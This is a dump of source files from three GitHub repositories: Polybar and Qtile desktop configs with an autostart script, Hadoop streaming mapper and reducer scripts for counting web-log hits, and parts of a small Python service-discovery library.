"length_bytes": 5757,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 229,
"path": "/my-polybar/user_modules.ini",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n\n# _ _ ___ ___ _ _ \n# | | | | | \\/ | | | | | \n# | | | |___ ___ _ __ | . . | ___ __| |_ _| | ___ ___ \n# | | | / __|/ _ \\ '__| | |\\/| |/ _ \\ / _` | | | | |/ _ \\/ __|\n# | |_| \\__ \\ __/ | | | | | (_) | (_| | |_| | | __/\\__ \\\n# \\___/|___/\\___|_| \\_| |_/\\___/ \\__,_|\\__,_|_|\\___||___/\n\n\n################################\n# #\n# -*- CHECKNETWORK -*- #\n# #\n################################\n\n[module/checknetwork]\ntype = custom/script\n\nexec = ~/.config/polybar/my-polybar/scripts/check-network\n\nformat-padding = 2\nformat-background = #fff85a\nformat-foreground = #000\nformat-underline = #fffb8f\nformat-overline = #fffb8f\n\n# Will the script output continous content?\ntail = true\n\n# Seconds to sleep between updates.\ninterval = 5\n\nclick-left = networkmanager_dmenu &\nclick-middle = networkmanager_dmenu &\nclick-right = networkmanager_dmenu &\n\n###########################\n# #\n# -*- UPDATES -*- #\n# #\n###########################\n\n[module/updates]\ntype = custom/script\n\nexec = ~/.config/polybar/my-polybar/scripts/updates.sh\n\n# Will the script output continous content?\ntail = true\n\n# Seconds to sleep between updates.\ninterval = 5\n\n# Available tags:\n# <output> - deprecated\n# <label> (default)\n#format = <label>\nformat-padding = 2\nformat-background = #fff85a\nformat-foreground = #000\nformat-underline = #fffb8f\nformat-overline = #fffb8f\n\n# Available tokens:\n# %output%\n# Default: %output%\n##label = %output:0:15:...%\n\nclick-left = ~/.config/polybar/my-polybar/scripts/lupdates &\nclick-middle = ~/.config/polybar/my-polybar/scripts/lupdates &\nclick-right = ~/.config/polybar/my-polybar/scripts/lupdates &\n\n############################\n# #\n# -*- LAUNCHER -*- #\n# #\n############################\n\n[module/launcher]\ntype = custom/text\ncontent = \n\n# \"content\" has the same properties as \"format-NAME\"\ncontent-background = ${color.ac}\ncontent-foreground = ${color.mf}\ncontent-underline = #fffb8f\ncontent-overline = #fffb8f\ncontent-padding = 3\n\nclick-left = ~/.config/polybar/my-polybar/scripts/launcher\nclick-right = ~/.config/polybar/scripts/my-polybar/launcher-alt\n\n# \"scroll-(up|down)\" will be executed using \"/usr/bin/env sh -c $COMMAND\"\n##scroll-up = ~/.config/polybar/scripts/launcher-full\nscroll-down = ~/.config/polybar/scripts/launcher-full\n\n###########################\n# #\n# -*- SYSMENU -*- #\n# #\n###########################\n\n[module/sysmenu]\ntype = custom/text\ncontent = \n\ncontent-background = ${color.ac}\ncontent-foreground = ${color.mf}\ncontent-underline = #fffb8f\ncontent-overline = #fffb8f\ncontent-padding = 3\n\nclick-left = ~/.config/polybar/my-polybar/scripts/powermenu\nclick-right = ~/.config/polybar/my-polybar/scripts/powermenu-alt\n\n#############################\n# #\n# -*- POWERMENU -*- #\n# #\n#############################\n\n[module/powermenu]\ntype = custom/menu\n\n# If true, <label-toggle> will be to the left of the menu items (default).\n# If false, it will be on the right of all the items.\nexpand-right = true\n\n# \"menu-LEVEL-N\" has the same properties as \"label-NAME\" with\n# the additional \"exec\" property\n#\n# Available exec commands:\n# menu-open-LEVEL\n# menu-close\n# Other commands will be executed using \"/usr/bin/env sh -c $COMMAND\"\nmenu-0-0 = reboot\nmenu-0-0-exec = menu-open-1\nmenu-0-1 = shutdown\nmenu-0-1-exec = menu-open-2\n\nmenu-1-0 = back\nmenu-1-0-exec = menu-open-0\nmenu-1-1 = reboot\nmenu-1-1-exec = systemctl reboot\n\nmenu-2-0 = shutdown\nmenu-2-0-exec = systemctl poweroff\nmenu-2-1 = back\nmenu-2-1-exec = menu-open-0\n\n# Available tags:\n# <label-toggle> (default) - gets replaced with <label-(open|close)>\n# <menu> (default)\n# Note that if you use <label-toggle> you must also include\n# the definition for <label-open>\n\n##format = <label-toggle> <menu>\n##format-prefix = ${menu.icon-menu}\nformat-spacing = 1 \n\nlabel-open = \nlabel-close = \n\n# Optional item separator\n# Default: none\nlabel-separator = |\n\nlabel-open-foreground = ${color.ac}\nlabel-close-foreground = ${color.ac}\nlabel-separator-foreground = ${color.ac}\n\n########################\n# #\n# -*- MENU -*- #\n# #\n########################\n\n[module/menu]\ntype = custom/menu\n\n# If true, <label-toggle> will be to the left of the menu items (default).\n# If false, it will be on the right of all the items.\nexpand-right = true\n\n# \"menu-LEVEL-N\" has the same properties as \"label-NAME\" with\n# the additional \"exec\" property\n#\n# Available exec commands:\n# menu-open-LEVEL\n# menu-close\n# Other commands will be executed using \"/usr/bin/env sh -c $COMMAND\"\nmenu-0-0 = Menu\nmenu-0-0-exec = ~/.config/polybar/scripts/launcher &\nmenu-0-1 = Files\nmenu-0-1-exec = thunar &\nmenu-0-2 = Terminal\nmenu-0-2-exec = termite &\nmenu-0-3 = Browser\nmenu-0-3-exec = firefox &\n\n# Available tags:\n# <label-toggle> (default) - gets replaced with <label-(open|close)>\n# <menu> (default)\n# Note that if you use <label-toggle> you must also include\n# the definition for <label-open>\n\n##format = <label-toggle> <menu>\n##format-prefix = ${menu.icon-menu}\nformat-spacing = 1 \n\nlabel-open = \nlabel-close = \n\n\n# Optional item separator\n# Default: none\nlabel-separator = |\n\nlabel-open-foreground = ${color.ac}\nlabel-close-foreground = ${color.ac}\nlabel-separator-foreground = ${color.ac}"
},
{
"alpha_fraction": 0.5057869553565979,
"alphanum_fraction": 0.5179522037506104,
"avg_line_length": 28.01225471496582,
"blob_id": "7bf707ca4c733012f022b724e111706b270bf561",
"content_id": "5dc22cac5e552280dd246841c2d3c766f16a04f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11855,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 408,
"path": "/qtile/config.py",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "# My qtile config.\n\n# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n# -*- IMPORTS -*-\n\nimport os, socket, subprocess\nfrom libqtile.config import Key, Screen, Group, Drag, Click\nfrom libqtile.lazy import lazy\nfrom libqtile import layout, bar, widget, hook\nfrom typing import List\n\n# -*- VARIABLES -*-\n\nmod = 'mod4'\nprompt = '{0}@{1}: '.format(os.environ['USER'], socket.gethostname())\n\nwmname = 'LG3D' # Assignment made for the DE to work with some java IDEs.\n\n# -*- FONTS -*-\n\nfonts = {\n 'mono-font': 'JetBrainsMono NF',\n 'bar-font': 'JetBrainsMonoMedium NF',\n}\n\n# -*- COLORS -*-\n\n#Dracula color scheme.\ncolors = {\n # Background and Foreground.\n 'background': '#282a36', # 0. grey --> bar(bar-background)\n 'foreground-hc': '#f8f8f2', # 1. white --> prompt(foreground-hc)\n 'foreground-lc': '#000000', # 2. black --> bar(foreground-lc)\n # Borders.\n 'border-non-focus': '#6272a4', # 3. dk-grey --> border(non-focus)\n 'border-focus': '#e1acff', # 4. lt-pink --> border(focus)\n # Widgets.\n 'yellow': '#f1fa8c', # 5. yellow --> bar(hardware-background)\n 'aqua': '#8be9fd', # 6. aqua --> bar(battery-background)\n 'green': '#50fa7b', # 7. green --> bar(volume-background)\n 'red': '#ff5555', # 8. red --> bar(net-background)\n 'orange': '#ffb86c', # 9. orange --> bar(updates-background)\n 'pink': '#ff79c6', # 10. pink --> bar(systray-background)\n}\n\n# -*- APPS -*-\n\nterm = 'termite'\nbrowser = 'firefox'\nvim = 'neovim'\nfile_manager = 'thunar'\n\n# -*- STARTUP -*-\n\[email protected]\ndef autostart():\n home = os.path.expanduser('~/.config/qtile/autostart.sh')\n subprocess.call([home])\n\n# -*- KEYBINDINGS -*-\n\nkeys = [\n # Switch between windows in current stack pane.\n Key([mod], 'k', lazy.layout.down()),\n Key([mod], 'j', lazy.layout.up()),\n \n # Move windows up or down in current stack.\n Key([mod, 'control'], 'k', lazy.layout.shuffle_down()),\n Key([mod, 'control'], 'j', lazy.layout.shuffle_up()),\n\n # Switch window focus to other pane(s) of stack.\n Key([mod], 'space', lazy.layout.next()),\n\n # Swap panes of split stack.\n Key([mod, 'shift'], 'space', lazy.layout.rotate()),\n\n # Open the terminal.\n Key([mod], 'Return', lazy.spawn(term)),\n\n # Toggle between different layouts as defined below.\n Key([mod], 'Tab', lazy.next_layout()),\n Key([mod], 'w', lazy.window.kill()),\n\n # Manage the DE.\n Key([mod, 'control'], 'r', lazy.restart()), # --> refresh.\n Key([mod, 'control'], 'q', lazy.shutdown()), # --> shutdown.\n Key([mod], 'r', lazy.spawncmd()), # --> spawn.\n\n # Spawn rofi d-run.\n Key([mod], 'd', lazy.spawn('rofi -show drun')),\n\n # Media keys.\n Key([], 'XF86AudioMute', os.system('$~/.config/dunst/dunstrc/volume.sh up')),\n Key([], 'XF86AudioRaiseVolume', lazy.spawn('amixer -c 1 -q set Master 5%+')),\n Key([], 'XF86AudioLowerVolume', lazy.spawn('amixer -c 1 -q set Master 5-')),\n Key([], 'XF86AudioNext', lazy.spawn('mpc next')),\n Key([], 'XF86AudioPrev', lazy.spawn('mpc prev')),\n Key([], 'XF86AudioPlay', lazy.spawn('mpc toggle')),\n Key([], 'XF86AudioStop', lazy.spawn('mpc stop')),\n\n # Brightness.\n Key([], 'XF86MonBrightnessUp', lazy.spawn('brightnessctl set +2%')),\n Key([], 'XF86MonBrightnessDown', lazy.spawn('brightnessctl set 2%-')),\n\n # Print-screen.\n Key([], 'Print', lazy.spawn('xfce4-screenshooter')),\n\n # App keys.\n Key([mod], 'b', lazy.spawn(browser)),\n Key([mod], 't', lazy.spawn('task')),\n Key([mod], 'f', lazy.spawn(file_manager)),\n]\n\nmouse = [\n Drag([mod], 'Button1', lazy.window.set_position_floating(),\n start=lazy.window.get_position()),\n Drag([mod], 'Button3', lazy.window.set_size_floating(),\n start=lazy.window.get_size()),\n Click([mod], 'Button2', lazy.window.bring_to_front())\n]\n\n# -*- GROUPS -*-\n\ndev = 'DEV'\nweb = 'WEB'\nterm = 'TERM'\n\ndef init_group_names():\n return [\n (dev, {'layout': 'monadtall'}),\n (web, {'layout': 'monadtall'}),\n (term, {'layout': 'monadtall'}),\n ]\n\ndef init_groups():\n return [Group(name, **kwargs) for (name, kwargs) in group_names]\n\nif (__name__ in ['config', '__main__']):\n group_names = init_group_names()\n groups = init_groups()\n\nfor i, (name, kwargs) in enumerate(group_names, 1):\n keys.append(Key([mod], str(i), lazy.group[name].toscreen())) # Change to another group.\n keys.append(Key([mod, 'shift'], str(i), lazy.window.togroup(name))) # Send window to group.\n\n# -*- LAYOUTS -*-\n\nlayout_theme = {\n 'border_width': 2,\n 'margin': 6,\n 'border_focus': colors['border-focus'],\n 'border_normal': colors['border-non-focus']\n}\n\nlayouts = [\n layout.Max(**layout_theme),\n layout.MonadTall(**layout_theme),\n # layout.Stack(num_stacks=2),\n # layout.Bsp(),\n # layout.Columns(),\n # layout.Matrix(),\n # layout.MonadWide(),\n # layout.RatioTile(),\n # layout.Tile(),\n # layout.TreeTab(),\n # layout.VerticalTile(),\n # layout.Zoomy(),\n]\n\n# -*- DEFAULT SETTINGS FOR THE WIDGETS -*-\n\nwidget_defaults = dict(\n font = fonts['bar-font'],\n fontsize = 12,\n padding = 3,\n background = colors['background']\n)\n\nextension_defaults = widget_defaults.copy()\n\n# -*- WIDGETS -*-\n\ndef init_widgets_list():\n return [\n\n # List of groups.\n widget.GroupBox(\n\n # -*- FONT Config -*-\n font = fonts['mono-font'],\n fontsize = 12,\n\n # -*- MARGINS and BORDERS -*-\n margin_x = 0,\n margin_y = 3.5,\n padding_x = 5, # Gap between the frame and the letters: x-axis.\n padding_y = 5, # Gap between the frame and the letters: y-axis.\n borderwidth = 3,\n rounded = False, # Rounded frame or not.\n\n # -*- HIGHLIGHTING -*-\n highlight_method = 'block',\n urgent_alert_method = 'block',\n\n # -*- COLORS -*-\n active = colors['foreground-hc'],\n inactive = colors['foreground-hc'],\n \n this_current_screen_border = colors['pink'], # Color of the selected workspace.\n # this_screen_border = colors['background'],\n # other_current_screen_border = colors['background'],\n # other_screen_border = colors['background'],\n\n background = colors['background']\n ),\n\n # Systray.\n # widget.TextBox(text = '|'),\n widget.Systray(),\n # widget.TextBox(text = ' |'),\n\n # Prompt.\n widget.Prompt(\n prompt = prompt,\n font = fonts['mono-font'],\n padding = 10,\n foreground = colors['foreground-hc'],\n background = colors['background']\n ),\n\n # Separator.\n widget.Sep(\n linewidth = 0, #To make it invisible.\n padding = 6 #Length with respect to the left most border.\n ),\n\n # Window name.\n widget.WindowName(),\n\n ######################\n # RIGHT-MOST WIDGETS #\n ######################\n\n # Hardware USAGE.\n # Memory.\n widget.TextBox(\n text = ' ',\n fontsize = 15,\n foreground = colors['foreground-lc'],\n background = colors['yellow']\n ),\n widget.Memory(\n foreground = colors['foreground-lc'],\n background = colors['yellow']\n ),\n\n # CPU.\n widget.TextBox(\n text = ' ',\n fontsize = 15,\n foreground = colors['foreground-lc'],\n background = colors['yellow']\n ),\n widget.CPU(\n format = '{freq_current}GHz {load_percent}%',\n foreground = colors['foreground-lc'],\n background = colors['yellow'],\n padding = 5\n ),\n\n #Separation between widgets.\n widget.Sep(linewidth = 0, padding = 4),\n\n # Battery.\n widget.TextBox(\n text = ' ',\n foreground = colors['foreground-lc'],\n background = colors['aqua']\n ),\n widget.Battery(\n format = '{percent:2.0%}',\n foreground = colors['foreground-lc'],\n background = colors['aqua'],\n update_delay = 5,\n padding = 5\n ),\n\n #Separation between widgets.\n widget.Sep(linewidth = 0, padding = 4),\n\n # Volume.\n widget.TextBox(\n text = str(' '),\n fontsize = 15, \n foreground = colors['foreground-lc'],\n background = colors['green']\n ),\n widget.Volume(\n foreground = colors['foreground-lc'],\n background = colors['green'],\n padding = 5\n ),\n\n #Separation between widgets.\n widget.Sep(linewidth = 0, padding = 4),\n\n # Net.\n\n # widget.TextBox(\n # text = ' ',\n # foreground = colors['foreground-lc'],\n # background = colors['red']\n # ),\n # widget.Net(\n # foreground = colors['foreground-lc'],\n # background = colors['red'],\n # format = '{down} ↓↑ {up}',\n # padding = 5\n # ),\n #\n # Separation between widgets.\n # widget.Sep(linewidth = 0, padding = 6),\n\n # Packages to update.\n widget.TextBox(\n text = ' ',\n fontsize = 18, \n foreground = colors['foreground-lc'],\n background = colors['orange']\n ),\n widget.Pacman(\n execute = 'alacritty',\n update_interval = 1800,\n foreground = colors['foreground-lc'],\n background = colors['orange'],\n padding = 5\n ),\n\n #Separation between widgets.\n widget.Sep(linewidth = 0, padding = 4),\n\n # Clock.\n widget.TextBox(\n text = ' ',\n foreground = colors['foreground-lc'],\n background = colors['pink']\n ),\n widget.Clock(\n format='%A, %B %d [ %H:%M ]',\n foreground = colors['foreground-lc'],\n background = colors['pink'],\n padding = 5\n ),\n ]\n\n# -*- SCREENS -*-\n\n # --> Im loading the setup for a dual monitor.\n\ndef init_widgets_screen1():\n return init_widgets_list()\n\ndef init_widgets_screen2():\n return init_widgets_list()\n\ndef init_screens():\n return [\n Screen(top=bar.Bar(widgets=init_widgets_screen1(), opacity=0.95, size=20)),\n Screen(top=bar.Bar(widgets=init_widgets_screen2(), opacity=0.95, size=20))\n ]\n\nif __name__ in ['config', '__main__']:\n screens = init_screens()\n\n# -*- FLOATING WINDOWS -*-\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: List\nmain = None\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n {'wmclass': 'confirm'},\n {'wmclass': 'dialog'},\n {'wmclass': 'download'},\n {'wmclass': 'error'},\n {'wmclass': 'file_progress'},\n {'wmclass': 'notification'},\n {'wmclass': 'splash'},\n {'wmclass': 'toolbar'},\n {'wmclass': 'confirmreset'}, # gitk\n {'wmclass': 'makebranch'}, # gitk\n {'wmclass': 'maketag'}, # gitk\n {'wname': 'branchdialog'}, # gitk\n {'wname': 'pinentry'}, # GPG key password entry\n {'wmclass': 'ssh-askpass'}, # ssh-askpass\n])\nauto_fullscreen = True\nfocus_on_window_activation = 'smart'\n"
},
{
"alpha_fraction": 0.5766567587852478,
"alphanum_fraction": 0.5825914740562439,
"avg_line_length": 23.658536911010742,
"blob_id": "66649d3f702315a9bb3187445160669a00f84327",
"content_id": "7086e94549e8638f5e5153e33a05e5b1bb9e87ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1011,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 41,
"path": "/qtile/autostart.sh",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n# -*- WALLPAPERS -*-\n\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper1.jpg &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper2.png &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper3.png &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper4.jpg &\n# feh --bg-scale ~/.config/qtile/wallpapers/wallpaper5.jpg &\nfeh --bg-scale ~/.config/qtile/wallpapers/wallpaper6.jpg &\n\n# -*- STARTUP -*-\n\n #########\n # PICOM #\n #########\n\n # If picom is running, kill it to prevent multiple instances.\n if ps -A | grep picom; then\n killall -q picom\n fi\n\n # Load picom\n exec picom --experimental-backends --config ~/.config/picom/picom.conf &\n \n #########\n # DUNST #\n #########\n\n # If dunst is running, kill it to prevent multiple instances.\n if ps -A | grep dunst; then\n killall -q dunst\n fi\n \n dunst -config ~/.config/dunst/dunstrc/dunstrc &\n\n #############\n # NM-APPLET #\n #############\n\n exec --no-startup-id nm-applet\n"
}
] | 7 |
anderskev/intro_hadoop
|
https://github.com/anderskev/intro_hadoop
|
388c3c9e461cfebf6a1c7aa445ae08cc7e0ba3ac
|
224bd91b12347f123929fda6e84a923283fe9ccc
|
c051bb20ad593b7f2ae75309dba87f78b4ae5666
|
refs/heads/master
| 2016-09-11T08:57:02.811245 | 2015-07-15T22:42:17 | 2015-07-15T22:42:17 | 39,035,342 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5727109313011169,
"alphanum_fraction": 0.5924596190452576,
"avg_line_length": 25.5238094329834,
"blob_id": "cf3c1718e82c6279ee9fa71e2775906b2a1fd321",
"content_id": "fa1e7c510dee812e6941140290535ce9f29600ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 557,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 21,
"path": "/project3_q1/most.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport sys\ntop_requests = []\ntop_hits = 0\nq1_hits = 0\n\nfor line in sys.stdin:\n request, hits = line.strip().split(\"\\t\")\n if int(hits) > top_hits:\n top_requests = []\n top_requests.append((request, hits))\n top_hits = int(hits)\n elif int(hits) == top_hits:\n top_requests.append((request, hits))\n if request == \"/assets/js/the-associates.js\":\n print \"{0}\\t{1}\".format(request, hits)\n q1_hits = int(hits)\n\nfor item in top_requests:\n print\"{0}\\t{1}\".format(item[0],item[1])\nprint q1_hits\n"
},
{
"alpha_fraction": 0.5896739363670349,
"alphanum_fraction": 0.60326087474823,
"avg_line_length": 23.53333282470703,
"blob_id": "1efc20ae164706c71be8349dcd7f8c50e715b66e",
"content_id": "f98f70fe65163fc1aa6899155f322c83688b9b4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 368,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 15,
"path": "/most.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport sys\ntop_requests = []\ntop_hits = 0\n\nfor line in sys.stdin:\n request, hits = line.strip().split(\"\\t\")\n if hits > top_hits:\n top_requests = []\n top_requests.append((request, hits))\n elif hits == top_hits:\n top_requests.append(request, hits))\n\nfor item in top_requests:\n print\"\\{0}\\t\\{1}\".format(item[0],item[1])\n"
},
{
"alpha_fraction": 0.5768321752548218,
"alphanum_fraction": 0.5933806300163269,
"avg_line_length": 17.39130401611328,
"blob_id": "0b33294795f5cbc72e35524317611da767b0d7c1",
"content_id": "6ec0efd619a4eae1fdcd3195beaaf0d2e319840a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 423,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 23,
"path": "/project3_q1/reducer.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport sys\n\npageHits = 0\noldKey = None\n\nfor line in sys.stdin:\n data = line.strip().split(\"\\t\")\n\n if len(data) != 2:\n continue\n\n thisKey, theseHits = data\n\n if oldKey and oldKey != thisKey:\n print \"{0}\\t{1}\".format(oldKey, str(pageHits))\n pageHits = 0\n\n oldKey = thisKey\n pageHits += int(theseHits)\n\nif oldKey != None:\n print \"{0}\\t{1}\".format(oldKey, pageHits)\n"
},
{
"alpha_fraction": 0.5199999809265137,
"alphanum_fraction": 0.5479999780654907,
"avg_line_length": 21.727272033691406,
"blob_id": "32d602bb07d22b75c43f2e25b63d4ed152738897",
"content_id": "3a78fd912fc07d931137bf1ea387ac2ebc2ccb12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 11,
"path": "/project3_q3/mapper.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport sys\n\nfor line in sys.stdin:\n data = line.split(\" \")\n if len(data) == 10:\n request = data[6]\n if request[:31] == \"http://www.the-associates.co.uk\":\n request = request[31:]\n print request\n"
},
{
"alpha_fraction": 0.5159574747085571,
"alphanum_fraction": 0.5478723645210266,
"avg_line_length": 19.88888931274414,
"blob_id": "f5a5b9b392879fdceb7aee14f7ed575f71e88acf",
"content_id": "75075f2c41c9baa2c38ead7be44afc6ef3b2fbcd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 188,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 9,
"path": "/project3_q1/mapper.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport sys\n\nfor line in sys.stdin:\n data = line.split(\" \")\n if len(data) == 10:\n ip, request = data[0], data[6]\n print \"{0} {1}\".format(ip, request)\n"
},
{
"alpha_fraction": 0.5409556031227112,
"alphanum_fraction": 0.5614334344863892,
"avg_line_length": 16.75757598876953,
"blob_id": "af893c97b5d3782da571283da9ccacd53f5580bc",
"content_id": "2704cb40a222c6b9a0093095de56e1068c0cc3bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 586,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 33,
"path": "/project3_q3/reducer.py",
"repo_name": "anderskev/intro_hadoop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport sys\n\nhits = 0\noldKey = None\nranks = []\n\nfor line in sys.stdin:\n data = line.strip()\n\n #if len(data) != 1:\n # continue\n\n thisKey = data\n \n if oldKey and oldKey != thisKey:\n print \"{0}\\t{1}\".format(oldKey, hits)\n ranks.append((oldKey,int(hits)))\n hits = 0\n\n oldKey = thisKey\n hits += 1\n\nif oldKey != None:\n print \"{0}\\t{1}\".format(oldKey, hits)\n\ntop_hits = 0\ntop_request = \"\"\nfor item in ranks:\n if item[1] > top_hits:\n top_hits = item[1]\n top_request = item[0]\nprint top_request, str(top_hits)\n"
}
] | 6 |
jolynch/service_discovery
|
https://github.com/jolynch/service_discovery
|
de26388fdb6cb8e9877cbb7cc27f7a15d8095d54
|
36e033662565ff6c2b0adbce843eb3acd98b25de
|
24b23d9e43ec86c80dfaf3626675eb7db32094f9
|
refs/heads/master
| 2021-01-01T05:42:05.220142 | 2015-01-21T21:43:00 | 2015-01-21T21:43:00 | 28,356,615 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7119784951210022,
"alphanum_fraction": 0.7126514315605164,
"avg_line_length": 35.24390411376953,
"blob_id": "68f3d96556acb88cf5ed2d568f9425ca412b0a1a",
"content_id": "d54b8df8f9baf3b21add09611cba2e8a15cd4fd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1486,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 41,
"path": "/service_discovery/providers/base_provider.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import, division\nfrom abc import ABCMeta, abstractmethod\n\n\nclass BaseServiceProvider(object):\n \"\"\"The abstraction on service discovery.\n\n This is the interface that all providers of service discovery must provide,\n whether it be looking in a file, DNS, environment variables, or whatever\n the implementer decides. If you implement this interface, service_discovery\n can allow your clients to be discovered.\n \"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def provide_all_service_addresses(self, service_name):\n \"\"\"Provide an iterable of ServiceAddress objects\"\"\"\n raise NotImplementedError(\n 'You must implement provide_all_service_addresses'\n )\n\n @abstractmethod\n def provide_service_address(self, service_name):\n \"\"\"Provide a single ServiceAddress object corresponding to\n service_name\"\"\"\n raise NotImplementedError('You must implement provide_service_address')\n\n\nclass InjectableServiceProvider(object):\n \"\"\"The abstraction on service discovery injection.\n\n This is the interface that providers of service discovery *may* provide if\n they wish to be the system used to inject.\n \"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def inject(self, service_address):\n \"\"\"Inject a single ServiceAddress into the mapping\"\"\"\n raise NotImplementedError('You must implement provide_service_address')\n"
},
{
"alpha_fraction": 0.689497709274292,
"alphanum_fraction": 0.689497709274292,
"avg_line_length": 12.6875,
"blob_id": "7c4cf60a60e2fcfb0d1ab502f447ba7e4ea607e3",
"content_id": "9f551378433a536fa827ea3b6bfb7215641e7f49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 219,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 16,
"path": "/Makefile",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": ".PHONY: all production web cmd test tests clean\n\nall: production\n\nproduction:\n\t@true\n\ntests: test\n\ntest:\n\ttox\n\nclean:\n\trm -rf service_discovery.egg-info\n\tfind . -name '*.pyc' -delete\n\tfind . -name '__pycache__' -delete\n"
},
{
"alpha_fraction": 0.7060241103172302,
"alphanum_fraction": 0.7349397540092468,
"avg_line_length": 40.5,
"blob_id": "af70c4c51abafa1455597a7ba394f5d6b64e4668",
"content_id": "bc7cd5040ee0d4a2ef870520f9d8d68f46e454b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 415,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 10,
"path": "/tests/test_service_address.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "from service_discovery.service_address import ServiceAddress\n\n\ndef test_contract():\n service_address = ServiceAddress('test_service', 'localhost', 1234)\n assert service_address.service_name == 'test_service'\n assert service_address.host == 'localhost'\n assert service_address.port == 1234\n assert service_address.provenance == 'Unknown'\n assert service_address.get_host_port() == 'localhost:1234'\n"
},
{
"alpha_fraction": 0.6693548560142517,
"alphanum_fraction": 0.6754032373428345,
"avg_line_length": 25.105262756347656,
"blob_id": "7cc57ae26545791c227042d07e865fa99486d805",
"content_id": "51b21f7c5853e3e8a65cbbe54bac5f9410f4e3b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 496,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 19,
"path": "/setup.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nsetup(\n name='service_discovery',\n version='0.1.0',\n description='An abstraction layer on service discovery',\n author='Joseph Lynch',\n author_email='[email protected]',\n url='https://github.com/jolynch/cluster_commander.git',\n packages=find_packages(exclude=['tests', 'bin']),\n include_package_data=True,\n setup_requires=['setuptools'],\n install_requires=[\n ],\n license='MIT License'\n)\n"
},
{
"alpha_fraction": 0.6317376494407654,
"alphanum_fraction": 0.6366377472877502,
"avg_line_length": 36.900001525878906,
"blob_id": "3aa024a0aa114c5cc096be15fe791f56d74cbc70",
"content_id": "36f3f3be7e6065602886f106f622cf661148a4a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2653,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 70,
"path": "/service_discovery/providers/env_provider.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
